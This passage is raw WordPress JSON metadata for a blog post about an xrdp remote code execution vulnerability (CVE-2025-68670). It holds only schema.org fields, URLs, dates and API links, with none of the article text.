by":"admin","Est. reading time":"11 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/05\/08\/cve-2025-68670-discovering-an-rce-vulnerability-in-xrdp\/#article","isPartOf":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/05\/08\/cve-2025-68670-discovering-an-rce-vulnerability-in-xrdp\/"},"author":{"name":"admin","@id":"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02"},"headline":"CVE-2025-68670: discovering an RCE vulnerability in xrdp","datePublished":"2026-05-08T08:04:25+00:00","mainEntityOfPage":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/05\/08\/cve-2025-68670-discovering-an-rce-vulnerability-in-xrdp\/"},"wordCount":1262,"image":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/05\/08\/cve-2025-68670-discovering-an-rce-vulnerability-in-xrdp\/#primaryimage"},"thumbnailUrl":"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/05\/07125309\/SL-RCE-in-xrdp-featured-990x400.jpg","keywords":["Cybersecurity"],"articleSection":["Cybersecurity","linux","Open source","RDP","Vulnerabilities","Vulnerabilities and exploits","Vulnerability reports","xrdp"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/05\/08\/cve-2025-68670-discovering-an-rce-vulnerability-in-xrdp\/","url":"https:\/\/blog.ibvl.in\/index.php\/2026\/05\/08\/cve-2025-68670-discovering-an-rce-vulnerability-in-xrdp\/","name":"CVE-2025-68670: discovering an RCE vulnerability in xrdp - Imperative Business Ventures Limited","isPartOf":{"@id":"https:\/\/blog.ibvl.in\/#website"},"primaryImageOfPage":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/05\/08\/cve-2025-68670-discovering-an-rce-vulnerability-in-xrdp\/#primaryimage"},"image":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/05\/08\/cve-2025-68670-discovering-an-rce-vulnerability-in-xrdp\/#primaryimage"},"thumbnailUrl":"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/05\/07125309\/SL-RCE-in-xrdp-featured-990x400.jpg","datePublished":"2026-05-08T08:04:25+00:00","author":{"@id":"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02"},"breadcrumb":{"@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/05\/08\/cve-2025-68670-discovering-an-rce-vulnerability-in-xrdp\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/blog.ibvl.in\/index.php\/2026\/05\/08\/cve-2025-68670-discovering-an-rce-vulnerability-in-xrdp\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/05\/08\/cve-2025-68670-discovering-an-rce-vulnerability-in-xrdp\/#primaryimage","url":"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/05\/07125309\/SL-RCE-in-xrdp-featured-990x400.jpg","contentUrl":"https:\/\/media.kasperskycontenthub.com\/wp-content\/uploads\/sites\/43\/2026\/05\/07125309\/SL-RCE-in-xrdp-featured-990x400.jpg"},{"@type":"BreadcrumbList","@id":"https:\/\/blog.ibvl.in\/index.php\/2026\/05\/08\/cve-2025-68670-discovering-an-rce-vulnerability-in-xrdp\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/blog.ibvl.in\/"},{"@type":"ListItem","position":2,"name":"CVE-2025-68670: discovering an RCE vulnerability in xrdp"}]},{"@type":"WebSite","@id":"https:\/\/blog.ibvl.in\/#website","url":"https:\/\/blog.ibvl.in\/","name":"Imperative Business Ventures Limited","description":"","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/blog.ibvl.in\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Person","@id":"https:\/\/blog.ibvl.in\/#\/schema\/person\/55b87b72a56b1bbe9295fe5ef7a20b02","name":"admin","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/blog.ibvl.in\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/4d20b2cd313e4417a599678e950e6fb7d4dfa178a72f2b769335a08aaa615aa9?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/4d20b2cd313e4417a599678e950e6fb7d4dfa178a72f2b769335a08aaa615aa9?s=96&d=mm&r=g","caption":"admin"},"sameAs":["https:\/\/blog.ibvl.in"],"url":"https:\/\/blog.ibvl.in\/index.php\/author\/admin_hcbs9yw6\/"}]}},"_links":{"self":[{"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/posts\/2972","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/comments?post=2972"}],"version-history":[{"count":0,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/posts\/2972\/revisions"}],"wp:attachment":[{"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/media?parent=2972"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/categories?post=2972"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.ibvl.in\/index.php\/wp-json\/wp\/v2\/tags?post=2972"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}